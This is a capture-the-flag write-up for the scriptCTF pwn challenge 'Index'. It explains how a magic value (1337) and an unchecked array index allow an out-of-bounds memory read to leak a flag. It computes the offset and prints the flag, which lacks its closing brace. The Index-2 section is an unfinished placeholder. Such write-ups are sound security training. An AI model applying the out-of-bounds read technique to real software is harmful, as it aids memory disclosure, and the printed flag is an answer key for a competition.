# pwn
## Challenges
### Index
> I literally hand you the flag, just exploit it already!
>
> * [index.zip](https://storage.googleapis.com/scriptctf_challenges/Pwn/Index/index.zip)
```bash
❯ unzip -l index.zip
Archive: index.zip
Length Date Time Name
--------- ---------- ----- ----
16632 2025-08-01 09:44 index
225600 2025-08-01 12:25 ld-linux-x86-64.so.2
2003408 2025-08-01 12:25 libc.so.6
--------- -------
2245640 3 files
```
* Load up to [dogbolt](https://dogbolt.org/), or `objdump`
* We could see this
* cmp $0x539 compares the user input with 0x539 in hex it is `1337` in decimal
* `je 150e` if they're equal — confirmed with decompiler
* 1337 will triggers a secret fucntion that open `flag.txt`
* We go to `LABEL_401448`
* Or the menu() to be exact
* Now, we need option 2 because `read_data` can read from any memory location without bounds checking
* The flag address is `0x40a0`
* we also know nums array is at `0x4060`
* ```
12c3: 48 8d 15 96 2d 00 00 lea 0x2d96(%rip),%rdx # 4060
```
* Finally the calculation is `nums_base + (index * 8)`
* `Flag address - nums address = 0x40a0 - 0x4060 = 0x40 = 64 bytes` \ `64 bytes ÷ 8 bytes per index = 8`
* Final exploit
* `scriptCTF{4rra4y_00B_unl0ck3d_0aed67c7e137`
### Index-2
> This time, you get the file pointer, not the flag itself.
>
> * [index-2.zip](https://storage.googleapis.com/scriptctf_challenges/Pwn/Index2/index-2.zip)
```bash
❯ unzip -l index-2.zip
Archive: index-2.zip
Length Date Time Name
--------- ---------- ----- ----
16608 2025-08-01 09:47 index-2
225600 2025-08-01 12:23 ld-linux-x86-64.so.2
2003408 2025-08-01 12:23 libc.so.6
--------- -------
2245616 3 files
```
{% hint style="warning" %}
tbd, will write later
{% endhint %}
